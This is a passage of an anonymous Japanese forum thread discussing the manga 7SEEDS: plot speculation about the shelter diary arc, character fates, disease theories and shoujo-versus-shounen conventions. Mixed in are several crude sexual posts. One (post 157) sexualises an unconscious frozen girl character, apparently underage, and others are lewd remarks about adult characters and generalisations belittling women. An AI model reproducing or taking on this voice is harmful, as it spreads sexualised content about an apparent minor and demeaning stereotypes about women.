第二次大戦中に取り残された島で女1人を巡る男の壮絶バトル事件があったの思い出した
なんかのサイトで見たけどえらいグロイ話で欝になったな

現実問題少女漫画だからエロ抜きで進んでるけど
実際にじゃあって同じ環境になったら女は妊娠しまくりそう

121 :花と名無しさん:2006/12/23(土) 11:56:51 ID:???0
>>120
うわぁそれは見たいようで見たくないようなグロ話だな

122 :花と名無しさん:2006/12/23(土) 14:02:10 ID:???0
有名な話じゃないか

123 :花と名無しさん:2006/12/23(土) 14:15:17 ID:???0
昔、「青のメソポタミア」っていう漫画があって、地球に取り残されたり、自分の意思で地球に残ったりした異星人が合流して、文明を築き、シュメール文明の祖になったという設定のがあって、
後に、その文明を見つけた、同星人の、「生めよ増やせよで増えていったんだろうよ。」というセリフがあった。

7種のメンバーたちはそのうち合流するだろうから、どこかで、村を築き、落ち着き先が決まったら、子作りに励むのでは・・・。なんといっても、それが人間の本能だし・・・。

124 :花と名無しさん:2006/12/23(土) 15:38:48 ID:???0
鷹に俺の精子を飲んでもらいたい

125 :花と名無しさん:2006/12/23(土) 16:50:34 ID:???0
自分が生きるか死ぬかと言う極限状況で、子作りしようとは思わんだろうしな。
そんなかんじのことを、冬のチームでも言ってたよな

126 :花と名無しさん:2006/12/23(土) 16:52:28 ID:???0
人間って割と死が身近になったら(戦争中とか)子孫を残そうとするけど、
流石にこういう場合は戦争とは違うし子孫を残そうとするかわからんね。
まぁ地球の人類ほぼ滅亡後なんて味わった事ある人いないだろうし。

127 :花と名無しさん:2006/12/23(土) 22:26:29 ID:???0
>>119
なんか過去ログ(田村由美作品19以前)で話題になってた、
火の鳥の望郷篇みたい

128 :花と名無しさん:2006/12/23(土) 23:00:26 ID:???0
19のときにはいなかったけど同じ事オモタ>火の鳥

この作品が火の鳥の一部だったら、血がつながってようが何だろうが
確実にポイポイ子孫を残そうとするだろうな

129 :花と名無しさん:2006/12/24(日) 00:08:42 ID:???O
少女漫画的には夢が…その、ゴニョゴニョ
でもま、主要キャラ関連さえきっちり恋愛フラグ描写があれば後は
ポコポコ産みまくってもかまわんよ。

130 :花と名無しさん:2006/12/24(日) 02:24:59 ID:???0
美鶴さんが二人の子供産んであげるって言ってたの思い出して
切なくなった。

131 :花と名無しさん:2006/12/24(日) 02:50:01 ID:???0
7SEEDSはバトロワと火の鳥と漂流教室と輝夜姫が混ざったような感じだな
輝夜姫はちと違うか

132 :花と名無しさん:2006/12/24(日) 04:04:47 ID:???0
花が入ってることから考えても作られたチームは夏A→春なんだよね。
なんで素直に春夏秋冬の順番で作らなかったのかな・・・

133 :花と名無しさん:2006/12/24(日) 04:25:44 ID:???O
要の祖父は夏が好きだったから夏の季語を子供らの名につけた。
貴士の名字は春に関連してるから下の名も春の季語にした。
のでは?

134 :花と名無しさん:2006/12/24(日) 04:26:36 ID:???0
単純に名前に季語の入ってる人を見つけて、集まった季節からだったりして。

135 :花と名無しさん:2006/12/24(日) 12:42:53 ID:???0
>>119
私が知ってる実話は、たった一人のイギリス人男性とポリネシアン系女性が10名、
子供が20数名だった。この島のことを調べるととてもおそろしい。

136 :花と名無しさん:2006/12/24(日) 14:22:09 ID:???0
>>135
それなんてエロゲ?のレベルだな

137 :花と名無しさん:2006/12/24(日) 17:13:33 ID:???0
>>135
それ18世紀の話だと思っていたら、なんと現代まで続いていてしかも
島の成年男子のほとんどが14歳以下の少女と性行為をしていたことが
明るみになった所だね

138 :花と名無しさん:2006/12/24(日) 17:31:01 ID:???O
春チームの住みか、それぞれの個室がないどころか寝室が男女隣り合わせなのはいかがなものか。

139 :花と名無しさん:2006/12/24(日) 18:51:57 ID:???O
皆、性生活ネタ好きだなあw

140 :花と名無しさん:2006/12/24(日) 19:06:24 ID:???0
>>139
女性対象の漫画とかヒットしてるのはみんな恋愛関係の漫画ばかりだからね
恋愛描写無縁の漫画でヒットした作品は見たこと無いよ
ここが男性コミックと違うところ

141 :花と名無しさん:2006/12/24(日) 19:42:21 ID:???O
まあ少女漫画的には、ここしばらく生々しくグロい実話ネタが細々と続いてると思うけど。
も少し7種では実際どうなりそうかって点で話したいな。

142 :花と名無しさん:2006/12/24(日) 23:51:49 ID:???0
>>137
ピトケアン島か

143 :花と名無しさん:2006/12/24(日) 23:56:15 ID:???0
まあ女ってのは恋愛云々しか興味ないっていうか理解できないからな
難しい設定とか理解できなくて、ただ美形キャラ同士がくっつくくっつかないしてれば満足なんだから。
だから女子高生でも漫画家になれるのさ

144 :花と名無しさん:2006/12/25(月) 00:00:00 ID:???O
貴士もつくづく虐殺に縁のある男だよ。しかし、もとはと言えば良心を殺せる分、人の
心に疎いところがあるからX計画を発動しなけりゃならない今回のような大きなミスを
引き起こしたんじゃないかって気が。

145 :花と名無しさん:2006/12/25(月) 00:04:29 ID:???O
わざわざその女の多い板に来てまで、さもわかったように見下す>>143のような男の気が知れません。

146 :花と名無しさん:2006/12/25(月) 01:49:47 ID:???0
っていうか女に何を期待しているのやら。
ぶっちゃけそのとおり。別に深い設定なんか誰も求めてないの。
ただキャラの恋愛がみたいだけなの。わかる?

147 :花と名無しさん:2006/12/25(月) 01:53:19 ID:???O
>>146
その通りじゃねーよw


148 :花と名無しさん:2006/12/25(月) 02:22:15 ID:???0
ああ、クリスマスだからか。変なのがいるのは

149 :花と名無しさん:2006/12/25(月) 03:48:13 ID:???0
キャラの恋愛なんて必要ありません
美少年同士のカラミがみたいのです
もちろん設定なんていりません

150 :花と名無しさん:2006/12/25(月) 11:21:53 ID:???0
>>148
辛いことが多い日ではあるな

151 :花と名無しさん:2006/12/25(月) 14:14:37 ID:???0
>>149
801板にカエレ!!

152 :花と名無しさん:2006/12/25(月) 14:36:06 ID:???0
私はどちらかというと美少年よりもおじさまの方が・・・・

153 :花と名無しさん:2006/12/25(月) 15:04:05 ID:???0
キャラの絡みなんていりません
桃太郎さえいればいいです

154 :花と名無しさん:2006/12/25(月) 18:38:52 ID:???0
鷹だけ年取ってしまったよね。くっつくにも年齢があいにくくなってしまったけれど、牡丹さんとなら、あうかな?
でも、ガイドは数に入ってないといってたよね。あれ、どういう意味だろう。子孫を残すための種には、なれないということなのかな。
でも、まあ、冷凍された時の世は崩壊してしまってるわけだし、子どもを作っても誰も文句はいわないだろうけど・・・。

155 :花と名無しさん:2006/12/25(月) 21:09:14 ID:???0
牡丹さんと合う年齢の人って、あと十六夜さんと百舌がいるな。
百舌と牡丹さんは同じチーム、十六夜さんとはガイド同士で
顔合わせとかあったのかな。鷹と牡丹さんは面識無し。
作者の中では決まっているけど、物語の中ではまだ出会っていない
カップルって結構いるんだろうね。

156 :花と名無しさん:2006/12/26(火) 00:20:47 ID:???O
鷹の意識的には15才以上からOKなんだろうけど、相手側の意識が問題だな。

157 :花と名無しさん:2006/12/26(火) 00:25:10 ID:???0
俺は解凍失敗した子がいいな
あの子にチンコ突っ込んだらひんやりしてるしキツそうだし最高だと思う

158 :花と名無しさん:2006/12/26(火) 06:17:24 ID:???0
あられちゃん?

159 :花と名無しさん:2006/12/26(火) 13:44:52 ID:???0
冷凍装置からは出て来ているのに、冷凍されていた当時のままの新陳代謝が行われていて生きているなんて、不思議だね。
あの子だけが目覚めないで生きているなんて、作者はその設定について、どんなことを想定しているのだろう。
物語の中で、どんな意味があるんだろうね。

160 :田村由美:2006/12/26(火) 14:19:35 ID:???0
>>159
ああ、そんな子いたね

161 :花と名無しさん:2006/12/26(火) 15:31:13 ID:???0
>>160
ちょwwww

162 :花と名無しさん:2006/12/26(火) 18:51:00 ID:???0
あの子は永遠に目覚めないまま少女のままで聖女扱いされるんじゃないか?
後々の生まれたメンバーの子孫からご本尊として崇められる

163 :花と名無しさん:2006/12/26(火) 20:51:04 ID:???0
バンが治療する事で彼の立ち直りのきっかけになるとか。
他にそんな事出来る人いないみたいだし。

164 :花と名無しさん:2006/12/26(火) 22:28:05 ID:???0
>162
すんごいゆっくりだけど、体の機能は動いてるんだよね??
目覚めないとしても、いずれ死んでしまうのでは…(´・ω・`)
でもそれってあの世界では一番幸せかも・・・

165 :花と名無しさん:2006/12/27(水) 02:57:42 ID:???0
早売りにバレ来てたね

………

166 :花と名無しさん:2006/12/27(水) 07:04:33 ID:???0
長文も読んだ
鬱展開すげー

167 :花と名無しさん:2006/12/27(水) 10:03:15 ID:???0
長文ってどこ

168 :花と名無しさん:2006/12/27(水) 11:20:06 ID:???0
早売りバレスレみてきた
なんとなく読めてたがかなり鬱展開…

本誌早く読みたいよ〜

169 :花と名無しさん:2006/12/27(水) 12:45:59 ID:???0
昔最初のほうだけ読んだ時はナツにイライラして投げたけど
最近出てるぶん一気に読んだら面白かった。

懐かしくなってBASARAも一晩かけて読破して泣いた。

170 :花と名無しさん:2006/12/27(水) 14:34:11 ID:???0
おっちゃん…orz

171 :花と名無しさん:2006/12/27(水) 16:17:02 ID:???0
>>166
おれも聞きたい。長文て?

172 :花と名無しさん:2006/12/27(水) 16:44:59 ID:???0
早売り フラワーズでぐぐる

173 :花と名無しさん:2006/12/27(水) 16:59:05 ID:???0
d
見つけた。読んだよ。鬱…orz

174 :花と名無しさん:2006/12/27(水) 21:29:18 ID:???0
ぐぐって「バレ書きました」ってのは見つけたけど
肝心のバレが見つからない…

おとなしく立ち読みしてきます

175 :花と名無しさん:2006/12/27(水) 21:33:54 ID:???0
↑自己解決しましたorz

176 :花と名無しさん:2006/12/27(水) 21:41:08 ID:???0
>>174俺はいまだにわかんね
とりあえず探して見るが

177 :花と名無しさん:2006/12/27(水) 22:19:23 ID:???0
フラワーズ7種バレ でぐぐって1番目。

178 :花と名無しさん:2006/12/28(木) 11:19:37 ID:???0
>>177
サンクス
うちのとこではもう発売されてた

これ以上キャラ増やすなよとか思ってたのに
マークかわいすぎる



179 :花と名無しさん:2006/12/28(木) 12:16:08 ID:???O
よく言われてた普通の共食いではなかったが、やっぱり虐殺、肥料化と(おそらく)
伝染病のダブル打撃?のようだな…。

180 :花と名無しさん:2006/12/28(木) 12:53:30 ID:???O
やっぱりあの眠らせて撹拌…というやり方は、夏Aの時に覚えたのをそのまま応用してるんだよな。
ちょっとは反省(後悔)してるのかと思わせておいて、全然変化の見えない貴士が怖い。
花はきっと最後まで読んだら両親の事だと気付くんだろうな。
あと、マークのキャラが好きだ。

181 :花と名無しさん:2006/12/28(木) 13:00:03 ID:???0
あのむにゃむにゃってなる波線の口が好きだ

〜←これ

182 :花と名無しさん:2006/12/28(木) 13:18:12 ID:???O
花、気付くかねえ。知り合いのいない関西シェルターにしてもらったことまでマークが
日記に書いてたらわからないけど。夏Aとの接触で初めて気付くかな?と思ってた。

183 :花と名無しさん:2006/12/28(木) 18:44:18 ID:???O
バレ読まずに本誌読んで後悔…

184 :花と名無しさん:2006/12/28(木) 18:54:45 ID:???0
>>183
ん?逆じゃなくて?
本誌読まずにバレ読んじゃって後悔するんなら分かるけど…

185 :花と名無しさん:2006/12/28(木) 19:04:04 ID:???O
心の準備ができてなかったんでない?

186 :花と名無しさん:2006/12/28(木) 20:00:38 ID:???0
今月えぐかったからね

187 :花と名無しさん:2006/12/28(木) 20:32:07 ID:???0
今までバレ見てマークっておっさんだと思ってたけど
若者なんだね

188 :花と名無しさん:2006/12/28(木) 20:41:55 ID:???0
もしかして、コミックス派だけど雑誌バレは読んでるって人がいる?

189 :花と名無しさん:2006/12/28(木) 20:57:45 ID:???0
ノシ
まとめて読みたいからコミクス派
でも毎月バレはチェック

190 :花と名無しさん:2006/12/28(木) 21:02:16 ID:???0
>>182
マークの日記に貴士の最期が記されて素性のわかる事を言い残すとか…。
父親のした事がわかった上で秋ヲや蘭と対峙するのもありか。
夏Aとの接触で日記の貴士が自分の父とわかるのかと思っていたけど。

191 :花と名無しさん:2006/12/28(木) 21:40:21 ID:???0
花は両親じゃないと言い切ってるね。
花の前ではいったいどんな夫婦だったんだろう。

192 :花と名無しさん:2006/12/28(木) 22:17:54 ID:???O
>>190
しかし人間をあんな風に殺しただけでもショックなのに、それが自分の父だなんて
知ったら普通の感覚では耐えられないと思うよ。
その箇所まで読んだ後に花の父らしき記述があったとしても、恐ろしい考えとして
追い出しちゃうんじゃなかろうか。貴士がそういう奴だともう知ってる読者と違い、
花は夏Aのことも知りようがないんだし。
確かに>>190の場合もないと言い切れないのが恐いが。

193 :花と名無しさん:2006/12/28(木) 22:53:36 ID:???O
今日本誌立ち読みしてきたノシ
マークの口〜カワユスねw
しかし…確かにウッてなるね…
タカシが必要ならば我々もそうなる(肥料とかになる)可能性もある、みたいなこと言ってて、結局政府は何がしたいんだ、って思えてきた…

194 :花と名無しさん:2006/12/28(木) 23:28:43 ID:???O
下手したらこの話自体何を言いたいんだって気になるな(;´Д`)
しかし貴士がもう良心の呵責も感じないくらい突き抜けた境地だとわかった今、
彼はどういう死に様が話として納得いくだろう?

195 :花と名無しさん:2006/12/29(金) 00:58:49 ID:???0
貴士は最高だな
ああいうクールで無感情の親父をヒイヒイ言わせたくなる
チンポしゃぶったりアナルに指入れたりして「ら・・・らめぇ・・・」って言わせたい

196 :花と名無しさん:2006/12/29(金) 01:26:40 ID:???0
お偉方のセンセイ達も早く肥料にするんだ

197 :花と名無しさん:2006/12/29(金) 02:29:16 ID:???0
牛が感染病にかかって暴れて人に噛み付いて、それが更に人にうつったとかか?
共食いだからヤコブ病かとも思ったが、潜伏期間が全然ないから違うか

198 :花と名無しさん:2006/12/29(金) 03:12:15 ID:???0
ま、そんなとだろうけど、牛の病気のチェックしなかったのかな?
人間は細かくチェックしたのに、牛はそれほど細かくチェックしきれなかったか?

199 :花と名無しさん:2006/12/29(金) 10:59:33 ID:???0
突っ込むと、アナだらけの計画だぁねー。

私もヤコブ病だと思った。食料がまた減る、みたいな。
それ以外の感染病は想像がつかなかった。

200 :花と名無しさん:2006/12/29(金) 11:02:36 ID:???0
>私もヤコブ病だと思った。食料がまた減る、みたいな。

あ、牛の場合は狂牛病か。スマソ

201 :花と名無しさん:2006/12/29(金) 11:10:14 ID:???0
ピートがサンタの格好したまま朽ちているということは、滅びは間もなくなのか…

202 :花と名無しさん:2006/12/29(金) 12:19:51 ID:???O
貴士はマークに殺されるのかな?どうせ妻と一緒に死ねなかったこと以外の
すべての可能性を考えてて平静なまま逝っちゃいそうだけど。

203 :花と名無しさん:2006/12/29(金) 13:07:00 ID:???0
妻と一緒に死ねなかったから、もうどういう死に方をしても同じ。変わんない。
どうでもいい。

とか思ってそう

204 :花と名無しさん:2006/12/29(金) 13:49:20 ID:???0
他人の生命も自分の生命も投げやりな貴士ワロス

205 :花と名無しさん:2006/12/29(金) 16:47:13 ID:???0
やっぱりオチは
かゆ うま 
なのか…

206 :花と名無しさん:2006/12/29(金) 17:05:56 ID:???0
>>205
わろた


207 :花と名無しさん:2006/12/29(金) 17:46:38 ID:???O
封印の間は感染した人間が閉じこめられたのかな?
なんにしてもグロい…

208 :花と名無しさん:2006/12/29(金) 17:59:27 ID:???0
ラーメン作れなくなったおっちゃんに泣いた

209 :花と名無しさん:2006/12/29(金) 19:11:00 ID:???0
おっちゃんの娘はなんで行かないのか疑問に思った
近親同士をひき離したら通信の虚像がばれる元じゃない?

210 :花と名無しさん:2006/12/29(金) 19:13:09 ID:???0
おっちゃんも娘さんも気づいてたんじゃないのかな

211 :花と名無しさん:2006/12/29(金) 19:19:53 ID:???0
シェルター無人ってことは封印失敗→計画破綻確定
→7seedsのためシェルターだけは遺そう→冬の間閉鎖だったりして。
何にせよあと1〜2話位で日記読み終わりそうだね。

212 :花と名無しさん:2006/12/29(金) 19:43:21 ID:???0
牛ってことに惑わされていたけど案外狂犬病だったりするのかもしれない

213 :花と名無しさん:2006/12/29(金) 22:50:00 ID:???0
狂犬病は人から人への感染の可能性は薄いのでは?

214 :花と名無しさん:2006/12/29(金) 23:03:14 ID:???0
原因がわからないと噛み付いたり引っ掻いたりしてくる人を止めようとして必死になって傷だらけになるんじゃ?
ていうか、仮に狂犬病ならワクチンがなければ助からないから

215 :花と名無しさん:2006/12/30(土) 02:47:08 ID:???0
あんな真面目な顔して
「できるな?君は最後の最後まで、嘘がつけるだろう?」
とか言ってんのに、姿はピー助なんだな。
俺だったら笑っちまいそうだ

216 :花と名無しさん:2006/12/30(土) 03:19:54 ID:???0
貴士はなんかの裏技使って生き残っててもらえないかなぁ
夏Aにぶっ殺させたいよあいつは


217 :花と名無しさん:2006/12/30(土) 04:11:38 ID:???0
もし映画化したらマークさん役はいっこく堂かな?

218 :花と名無しさん :2006/12/30(土) 08:48:33 ID:???0
自分の中では貴士の株がちょっと上がった。


219 :花と名無しさん:2006/12/30(土) 09:19:35 ID:???0
貴士は死ぬ前に
微笑む美穂が手を差し伸べてくるみたいな幻影を絶対見ると思う
自分も微笑んで手を伸ばして触れるかという瞬間
致命傷みたいな

220 :花と名無しさん:2006/12/30(土) 18:16:08 ID:???0
投げたピザも食べます・・・って

んなこたどうでもいいよwww

221 :花と名無しさん:2006/12/30(土) 18:18:53 ID:???0
いや、どうでもよくない
あそこでああいう風に描いてなかったら、食い物を粗末にするな!
と俺は編集部に怒りの手紙を書いていただろう。
ああいう何気ない心配りが素晴らしい

222 :花と名無しさん:2006/12/30(土) 18:28:56 ID:???0
今のところ花には父だと分かってないけど知り合いがいない近畿にしたは書いてるし
ボロッと最後に娘の名前を読んだりしたらそれも書かれてそうだ

223 :花と名無しさん:2006/12/30(土) 19:32:52 ID:???0
前から疑問に思ってるんだけどどうして少女マンガって
マンガの欄外に色々手書き文字で色々書くの好きなんだろうね?
男対象のマンガにはかなりそういうの少ないし

224 :花と名無しさん:2006/12/30(土) 20:02:35 ID:90eVFAwW0
少年漫画は、だいたい週刊だから、そういう手書き文字を書く暇がない。以上。

225 :花と名無しさん:2006/12/30(土) 21:08:09 ID:???0
>>222
既にマークには子供が別の所にいる事も言ってるし、
この先せっぱつまった状況でもっと具体的な事も言うかも。
全滅必至になれば外に漏れる心配も無いから七種計画に関して、
娘が安全になれば目覚め別の所に眠っている恋人と子孫を残すから
ここで死んでも自分は平気(君達とか違う)とか。

226 :花と名無しさん:2006/12/30(土) 21:43:27 ID:???0
>>225
貴士は酷薄だけどバカではないから、そんな何の得にもならないことは言わないだろ

227 :花と名無しさん:2006/12/30(土) 21:57:47 ID:???0
安居には禍根になるような事を言っているが。

228 :花と名無しさん:2006/12/30(土) 23:03:29 ID:???0
>>223
キモイからだろう
この辺が男と女の違うところだ

229 :花と名無しさん:2006/12/30(土) 23:06:58 ID:???0
なんか人が一杯攪拌されてたが、あの巨大ファンとか下にあるであろう器はわざわざ設置したんだよな
シェルターもそうだが、そこから地下に線路引いて、ファンを設置してその下に器を入れて、
さらにその器の中身(血や肉や内臓とか)を運ぶ線路を別に作って・・・・
スゲエな。何年、そしていくらかかったんだよ

230 :花と名無しさん:2006/12/31(日) 00:58:16 ID:???0
>>217
男女七人の時のヤングさんま

231 :花と名無しさん:2006/12/31(日) 01:14:06 ID:???O
>>226
貴士は頭いいつもりで描かれてるけど、色々バカだと思うなあ…。
こんな父親に愛や慈しみなんて教えられたくねええww

232 :花と名無しさん:2006/12/31(日) 01:34:49 ID:???0
貴士ってあんまりある名前じゃないだろ花、気づけよ…と思って、試しに
ぐぐってみたら、そこそこヒットして驚いたw
でもマークの日記に美帆の名前が書いてないのは、ちょっとずるいよな。
実際、日記に美帆のことを書く時、いちいち「貴士さんの奥さん」なんて書くの
カッタルイと思うし。

233 :花と名無しさん:2006/12/31(日) 01:59:24 ID:???0
>>223
マガジン限定だが台詞の横の小さい写植みたいなもんだろ

234 :花と名無しさん:2006/12/31(日) 02:00:36 ID:???0
>>232
単純にマークが名前知らなかったんじゃ

235 :花と名無しさん:2006/12/31(日) 02:03:32 ID:???O
美帆と接触はしなかったみたいだしな。

236 :花と名無しさん:2006/12/31(日) 03:01:31 ID:???O
全滅エンド確定なのが辛いな
日記あるってことは最期の方まで生きてたんだろうけど
ぼく地球みたいにシェルターにマーク(とピート)だけとかになったら悲しすぎる

237 :花と名無しさん:2006/12/31(日) 03:41:17 ID:???0
>>224
月刊誌や隔週誌もそういうやり方はないけど?

238 :花と名無しさん:2006/12/31(日) 03:44:53 ID:???0
>>228
あと、男対象のマンガ雑誌は雑誌の表紙に作品名が大きく載るけど
女対象のマンガ雑誌は作者名が大きく載るんだよね
これも不思議な違い・・・

239 :花と名無しさん:2006/12/31(日) 04:46:55 ID:???0
女は作品だけでなく、作家にも強い思い入れがあるからだよ。
男でやたら作家の人間性にまでこだわるのはオタだけでしょう。
作家側も、たぶん男性作家より読者を身近に感じてる。
欄外文字も作者と読者のコミュニケーションみたいなもん。
たむさんも、他の作家さんも、よく(○○さん、○○をありがと〜〜)とか
わざわざスペース取ってまで、イベントやプレゼントのお礼とか
書く人もいるじゃん。

だからこそ、そのコミュニケーションが何かの拍子でマイナスに作用した場合
(原因は作家側、読者側問わず)、誌面で読者叩きをする痛い作家もいるし、
読者側も呪いのプレゼントを作家に贈りつけたりとかするみたいだしねえ。

240 :花と名無しさん:2006/12/31(日) 13:33:23 ID:???O
全滅エンド確定?
つか7種だけ生きてて子孫繁栄なんて無理すぎなのにな
海外のメンバーもいるならまぁ多少は血は薄くなるだろうけど
そんな必死に子孫繁栄の為に子作り熱心になるとも思えない


241 :花と名無しさん:2006/12/31(日) 13:57:08 ID:A49faRD20
龍宮は全滅エンドっぽいね。
他のシェルターも連絡とれないってことは似たような物?
しかし、あの馬鹿共が穴ほらなくても、最初からいずれは
「伊勢のシェルター」行きを考えてたわけだよね?
普通の神経じゃ、やってられないね確かね。

242 :花と名無しさん:2006/12/31(日) 14:01:32 ID:???O
全滅はしないよ。

>>239
私は作家個人にあまり思い入れは持たないほうなんで、それは不思議だなあ。


243 :花と名無しさん:2006/12/31(日) 14:39:29 ID:???O
>>242の1行目は>>240ね。
でも墓穴を掘りさえしなければ3年は食料が保ったのは本当だよね?それ
で外に出られるというところは疑わしく思うけど。
まあ病気発生でだめになる可能性もあったしな。
この章のラストは、冬の倉庫を開けかけた蘭達を花達が阻止して終わりそ
うかな。

244 :花と名無しさん:2006/12/31(日) 14:54:40 ID:???0
ちまきちゃんの「70のおばあちゃんなんてシェルターには入れてくれないでしょ」っていうセリフを読んだときは、
まさか、本当に、シェルターでの生活が物語に出てくるとは思わなかったな。
そのころは、この連載、途中で打ち切りとかにならないよね!?って思ってたし、
物語がどういう風に転んでいくのかも(ナツたちは、どういう風に他のチームと関わっていくのかな、等)、よくわからなかったし、
そもそも、シェルターってほんとにあるのか、って思ってたから。

245 :花と名無しさん:2006/12/31(日) 14:57:04 ID:???0
ホントは竜宮以外にシェルターなんか一つも無さそう。

246 :花と名無しさん:2006/12/31(日) 15:05:48 ID:A49faRD20
三年分の食料があったのは本当かもしれないけど、貴士はおそらく
3年で出られる環境になるとは思ってなかった思う。
だから間引きである「伊勢のシェルター」行きは最初から前提だっ
田と思うし、スタッフ達に「最後まで」己の仕事をまっとうできる
かということを問い掛けていたんだと思う。


247 :花と名無しさん:2006/12/31(日) 16:12:47 ID:???0
そもそも隕石が衝突して氷河期が来るのに
3年で出ようなんて無謀もいいとこ
シェルターはあくまでも「一応やっとこ」的なものでは?

248 :花と名無しさん:2006/12/31(日) 17:46:59 ID:???O
>>245
私もそう思った。
だから、マークは最初にスカウトされたとき、「嘘はうまいか?」と聞かれたんだと思う。

249 :花と名無しさん:2006/12/31(日) 18:21:37 ID:???0
でも、「知り合いのいない関西にしてもらった」って言ってるから、関東にも一つくらいあるのかも。
でも、それも、嘘かな・・・。

250 :花と名無しさん:2006/12/31(日) 19:12:45 ID:???0
あった事はあったのかも。
あの穴掘り三人組のような考えなしは他にもいると思うし
速攻でバタバタ破滅したのかも(施設の欠陥の可能性もあるかも)

251 :花と名無しさん:2006/12/31(日) 21:07:45 ID:???0
百舌戸首相のいるネオ東京(だっけ?)はあったはずだと思うなあ。

252 :花と名無しさん:2006/12/31(日) 22:07:02 ID:???0
あ、そうか、百舌戸首相、X-DAYに何かするんだっけ
でも、今回の章が始まってから、それらしき人は、出てないよね

そういえば、花が知ってた首相の名前(百舌戸)をハルが知らなかったのも、気になってたんだよな…
解凍時の時代がずれているんじゃないか、って、思ったんだけど

253 :花と名無しさん:2006/12/31(日) 22:34:25 ID:???0
>>252
それは単にハルが今風の政治関係には全く興味のない
青少年だったからでは?


254 :花と名無しさん:2006/12/31(日) 23:25:55 ID:???0
若い子は興味ないと全然分からんからな
政治とか首相とか

255 :花と名無しさん:2007/01/01(月) 03:27:33 ID:???0
いくらなんでも小泉知らない奴はいないと思う。
でも小渕、森、村山あたりになるとちょっとモノを知らない学生は怪しいかな。
羽田、宇野あたりは一般人でも怪しかったw
百舌戸は表向き、地味な総理だったのかな。

256 :花と名無しさん:2007/01/01(月) 03:29:51 ID:???0
それはそうと、新年あけましておめでとうございます。

257 :花と名無しさん:2007/01/01(月) 13:41:10 ID:???0
首相がもう小泉ではないことを一昨日くらいに知った。

258 :花と名無しさん:2007/01/01(月) 13:59:19 ID:???0
まぁ、首相の名前が違ってたら違ってたらで、
「え? 首相は○○だよ」って言うもんな。
それを言わなかったってことは、変わってすぐだった、ぐらいのことかな。

259 : 【小吉】 :2007/01/01(月) 15:08:38 ID:???0
これからの花と嵐の運勢は

260 :花と名無しさん:2007/01/02(火) 01:29:49 ID:???0
>>259
微妙な…w

261 :花と名無しさん:2007/01/02(火) 17:43:43 ID:???0
いずれは、出会うんでしょうね。そうでなきゃ、花と嵐が恋人同士だという設定の意味がないし・・・。
でも、最終的に結ばれるかどうかは、どうなんでしょうね。
でも、この2人、お互いがこの世にいなければ、生きていても意味がないと、いうくらい深く愛し合っているんだね。
貴士のいう、高校生レベルというには、ものすごい、愛情ですね。

262 :花と名無しさん:2007/01/02(火) 20:32:20 ID:???0
逆に若いからこその情熱だと思うが

263 :花と名無しさん:2007/01/02(火) 22:37:33 ID:???0
じゃあ、貴士も高校生レベルだねw

264 :花と名無しさん:2007/01/02(火) 23:34:03 ID:???0
まあ高校生なんて頭の悪い年代だからな
突っ走っちゃうことはよくある話

265 :花と名無しさん:2007/01/03(水) 00:13:54 ID:???0
極限状態だから余計に恋愛に縋りたいって感じかなあと思った。
つり橋効果?

266 :花と名無しさん:2007/01/03(水) 02:20:13 ID:???0
種族維持本能と言いたいところだが、秋の二人なんかは単なる現実逃避に思える。
花もそういう部分もあるんじゃないだろうか。

267 :花と名無しさん:2007/01/03(水) 08:09:55 ID:???0
自分は再会するまでは判断は控えるよ。
再会してからがある意味試練かもね。

268 :花と名無しさん:2007/01/03(水) 09:49:04 ID:???0
再会してもとりまく世界があの状況なら
2人は性格上盛り上がってるままだと思う。

元いた世界の状況に近くなるくらい平和になって
人口もトントン拍子に増えて、何の憂いもなくなって
数年たった頃なら少しは2人の熱も下がるかも??

全ての状況が好転して平和って展開には絶対ならないだろうけどさw

269 :花と名無しさん:2007/01/03(水) 14:37:01 ID:???0
俺、男だが、世界で女の子二人だけになったら、
その子がどんなブスでも、どんな性悪でも、激しく好きになって、
セックスに燃える自信があるよw
平時じゃ絶対お近づきになりたくないような女の子相手でも多分そうなる。
だって他にやることないし、何よりもそうしなきゃ寂しくて耐えられないと
思うから。
それが何となく想像つくから、所詮人間も一皮むけば、DNAを伝えるという
本能のままに生きる獣に過ぎないな、と思う。
まあ出来ればそんな皮、一生むきたくないけどね。別に人の皮をかぶったままの
愛情がまやかしだとか、インチキだとか、思ってるわけじゃないし。

270 :花と名無しさん:2007/01/03(水) 20:35:28 ID:???0
>>269
問題は女がそう思うかどうかw

271 :花と名無しさん:2007/01/03(水) 20:59:21 ID:???0
>>269はあゆに張り倒される

272 :花と名無しさん:2007/01/03(水) 21:30:32 ID:???0
>>269
お気の毒に
その状況下で恐らく、あゆに迫った男と同じ末路
を辿る可能性高し…


273 :花と名無しさん:2007/01/03(水) 22:36:25 ID:???0
恋人以外なにもいらないって、
ドラマチックだしロマンティックだと思うよ〜。

誰かに助けてもらっても、同じ考えでシェルターに入っても
穴掘って「会いたい人がいてるんや〜」って言ってなにかやっても
世界に恋人がいればいいんだよね。

世界が2人だけならいいけど、そうじゃないなら
精神的引きこもりかも。

引きこもりじゃなくても
都合いいと思ってしまう。世界で恋人以外いらないのに
いらない他人にこういいうことはやるな、なんて。


274 :花と名無しさん:2007/01/03(水) 22:41:13 ID:???0
>>273
日本語でお願いします

275 :花と名無しさん:2007/01/03(水) 23:08:13 ID:???0
>>266
秋の2人ってくるみちゃんと流星の方?

276 :花と名無しさん:2007/01/03(水) 23:23:23 ID:???O
2巻のモノローグだと、花は嵐のこと、自分の言うことを否定せず聞いてくれるから好き、
みたいな感じだったなあ。

277 :花と名無しさん:2007/01/03(水) 23:42:46 ID:???0
>>269
俺も男だが、それはないよ
ブスだったら性的欲求や恋愛感情はわかない。単なる友達だな
だったらオナニーしてたほうがいい

278 :花と名無しさん:2007/01/04(木) 00:14:23 ID:???0
>>266
厳しく管理されて禁止されると逆に燃えるもんだと思う
いずれできていたはず

279 :花と名無しさん:2007/01/04(木) 02:06:51 ID:???O
蝉丸かわいいよ蝉丸

280 :269:2007/01/04(木) 07:08:59 ID:???0
うーむ、思ったより反発を受けたw
でもねえ、世界で二人っきりだよ。本当に2人っきりって仮定だよ。
七種チームみたく7、8人じゃないよ。
そこで平時では起こりえないような精神的変化があったっておかしくない。
一日二日じゃわからんけど、何ヶ月も二人っきりでいると想像すると、
やっぱりそうなっちゃうんじゃないかと思う。
なんか俺、単なる発情エロ男のように書かれてるがw、性欲とか恋愛感情とか、
そんなレベルで言ってるんじゃなくて、まったく他人と出会うあての無い中で、
人は一人で突っ張りきれるほど強くないんじゃないかってこと。
俺だって平和な時はなんとなく>>277のような気持ちでいるけど、
冷静に想像力を働かせて見ると、本当に自分が自分のままでいられるのか?と思った。
